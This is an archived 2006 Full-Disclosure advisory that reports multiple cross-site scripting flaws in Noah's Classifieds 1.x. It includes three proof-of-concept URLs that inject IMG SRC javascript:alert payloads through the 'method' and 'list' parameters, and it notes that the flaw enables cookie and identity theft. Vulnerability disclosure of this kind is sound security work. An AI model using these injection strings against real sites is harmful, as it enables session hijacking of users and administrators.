lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Thu Mar  9 03:52:33 2006
From: zeus.olimpusklan at gmail.com (0o_zeus_o0 security-mx.org)
Subject: Noah's Classifieds Multiple Cross-Site Scripting
	Vulnerabilities

###########################################################################
# Advisory #10 Title: Noah's Classifieds Multiple Cross-Site Scripting
Vulnerabilities
#
#
# Author: 0o_zeus_o0 ( Arturo Z. )
# Contact: zeus@...sdelared.com
# Website: www.elitemexico.org
# Date: 09/03/2006
# Risk: Medium
# Vendor Url: http://classifieds.phpoutsourcing.com/
# Affected Software: Noah's Classifieds
# Non Affected:
#
# We Are: olimpus klan team
#
#Info:
##################################################################
#this bug consists of inserting script in the line of execution of
#
#the affected system causing the robbery of cookie and like consequence
#
#the identity robbery of the affected user or administrator
#
#
#Example XSS:
##################################################################
#
#http://www.example.com/[dirpath]/index.php?method=showhtmllist&list=<IMG
SRC=`javascript:alert("0o_zeus_o0, 'XSS'")`>
#
#http://www.example.com/[dirpath]/index.php?method=<IMG
SRC=`javascript:alert("0o_zeus_o0, 'XSS'")`>
#
#http://www.example.com/[dirpath]/index.php?method=login_form&list=<IMG
SRC=`javascript:alert("0o_zeus_o0, 'XSS'")`>
#
##################################################################
#
#Solution:
##################################################################
#
#VULNERABLE VERSIONS
##################################################################
#
#1.x Other versions may also be affected.
#
##################################################################
#Contact information
#0o_zeus_o0
#zeus@...sdelared.com
#www.elitemexico.org
##################################################################
#greetz: lady fire,Mi beba, olimpus klan team and elitemexico
##############################################################################
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060308/b7cdc7f9/attachment.html

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ